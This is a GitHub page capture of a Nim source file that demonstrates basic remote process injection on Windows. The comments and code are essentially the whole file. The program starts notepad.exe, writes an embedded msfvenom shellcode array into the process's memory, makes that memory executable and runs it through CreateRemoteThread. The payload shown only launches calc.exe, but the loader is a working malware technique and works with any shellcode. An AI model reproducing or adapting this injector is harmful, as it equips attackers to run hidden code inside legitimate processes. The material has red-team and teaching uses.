forked from ahkeur/Injections
-
Notifications
You must be signed in to change notification settings - Fork 0
Expand file tree
/
Copy pathBasic.nim
More file actions
108 lines (90 loc) · 4.13 KB
/
Basic.nim
File metadata and controls
108 lines (90 loc) · 4.13 KB
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
import winim/lean
#[
Basic remote process injection.
Steps :
0. CreateProcess to create a new process to inject into.
1. OpenProcess to get a handle to the remote process.
2. VirtualAllocEx to allocate memory as RW in the remote process.
3. WriteProcessMemory to write shellcode to the allocated memory.
4. VirtualProtectEx to change the memory protection to RX.
5. CreateRemoteThread to create a remote thread to execute the shellcode.
6. WaitForSingleObject to wait for the remote thread to finish executing.
]#
# msfvenom -p windows/x64/exec CMD=calc.exe -f nim
var sc: array[276, byte] = [
byte 0xfc,0x48,0x83,0xe4,0xf0,0xe8,0xc0,0x00,0x00,0x00,0x41,
0x51,0x41,0x50,0x52,0x51,0x56,0x48,0x31,0xd2,0x65,0x48,0x8b,
0x52,0x60,0x48,0x8b,0x52,0x18,0x48,0x8b,0x52,0x20,0x48,0x8b,
0x72,0x50,0x48,0x0f,0xb7,0x4a,0x4a,0x4d,0x31,0xc9,0x48,0x31,
0xc0,0xac,0x3c,0x61,0x7c,0x02,0x2c,0x20,0x41,0xc1,0xc9,0x0d,
0x41,0x01,0xc1,0xe2,0xed,0x52,0x41,0x51,0x48,0x8b,0x52,0x20,
0x8b,0x42,0x3c,0x48,0x01,0xd0,0x8b,0x80,0x88,0x00,0x00,0x00,
0x48,0x85,0xc0,0x74,0x67,0x48,0x01,0xd0,0x50,0x8b,0x48,0x18,
0x44,0x8b,0x40,0x20,0x49,0x01,0xd0,0xe3,0x56,0x48,0xff,0xc9,
0x41,0x8b,0x34,0x88,0x48,0x01,0xd6,0x4d,0x31,0xc9,0x48,0x31,
0xc0,0xac,0x41,0xc1,0xc9,0x0d,0x41,0x01,0xc1,0x38,0xe0,0x75,
0xf1,0x4c,0x03,0x4c,0x24,0x08,0x45,0x39,0xd1,0x75,0xd8,0x58,
0x44,0x8b,0x40,0x24,0x49,0x01,0xd0,0x66,0x41,0x8b,0x0c,0x48,
0x44,0x8b,0x40,0x1c,0x49,0x01,0xd0,0x41,0x8b,0x04,0x88,0x48,
0x01,0xd0,0x41,0x58,0x41,0x58,0x5e,0x59,0x5a,0x41,0x58,0x41,
0x59,0x41,0x5a,0x48,0x83,0xec,0x20,0x41,0x52,0xff,0xe0,0x58,
0x41,0x59,0x5a,0x48,0x8b,0x12,0xe9,0x57,0xff,0xff,0xff,0x5d,
0x48,0xba,0x01,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x48,0x8d,
0x8d,0x01,0x01,0x00,0x00,0x41,0xba,0x31,0x8b,0x6f,0x87,0xff,
0xd5,0xbb,0xf0,0xb5,0xa2,0x56,0x41,0xba,0xa6,0x95,0xbd,0x9d,
0xff,0xd5,0x48,0x83,0xc4,0x28,0x3c,0x06,0x7c,0x0a,0x80,0xfb,
0xe0,0x75,0x05,0xbb,0x47,0x13,0x72,0x6f,0x6a,0x00,0x59,0x41,
0x89,0xda,0xff,0xd5,0x63,0x61,0x6c,0x63,0x2e,0x65,0x78,0x65,
0x00]
proc main(): void =
# Creating manually the victim process
var si: STARTUPINFO
var pi: PROCESS_INFORMATION
si.cb = sizeof(STARTUPINFO).DWORD
if CreateProcess(nil, "notepad.exe", nil, nil, false, 0, nil, nil, addr si, addr pi) == 0:
echo "Failed to create process"
echo GetLastError()
quit(1)
var pid: DWORD = pi.dwProcessId
echo "Created notepad.exe with PID: ", pid
var hProcess: HANDLE = OpenProcess(PROCESS_ALL_ACCESS, 0, pid)
echo "hProcess: ", hProcess.repr
if hProcess == 0:
echo "Failed to open process with pid ", pid
echo GetLastError()
quit(1)
var allocatedMemory: LPVOID = VirtualAllocEx(hProcess, NULL, len(sc), MEM_COMMIT or MEM_RESERVE, PAGE_READWRITE)
echo "allocatedMemory: ", allocatedMemory.repr
if allocatedMemory == NULL:
echo "Failed to allocate memory in remote process"
CloseHandle(hProcess)
echo GetLastError()
quit(1)
var bytesWritten: SIZE_T = 0
if WriteProcessMemory(hProcess, allocatedMemory, cast[LPVOID](addr sc), len(sc), addr bytesWritten) == 0:
echo "Failed to write shellcode to remote process"
VirtualFreeEx(hProcess, allocatedMemory, 0, MEM_RELEASE)
CloseHandle(hProcess)
echo GetLastError()
quit(1)
echo "bytesWritten: ", bytesWritten
var oldProtect: DWORD = 0
if VirtualProtectEx(hProcess, allocatedMemory, len(sc), PAGE_EXECUTE_READ, addr oldProtect) == 0:
echo "Failed to change memory protection in remote process"
VirtualFreeEx(hProcess, allocatedMemory, 0, MEM_RELEASE)
CloseHandle(hProcess)
echo GetLastError()
quit(1)
echo "Changed memory protection to RX"
var hThread: HANDLE = CreateRemoteThread(hProcess, NULL, 0, cast[LPTHREAD_START_ROUTINE](allocatedMemory), NULL, 0, NULL)
echo "hThread: ", hThread.repr
if hThread == 0:
echo "Failed to create remote thread"
VirtualFreeEx(hProcess, allocatedMemory, 0, MEM_RELEASE)
CloseHandle(hProcess)
echo GetLastError()
quit(1)
WaitForSingleObject(hThread, INFINITE)
CloseHandle(hThread)
when isMainModule:
main()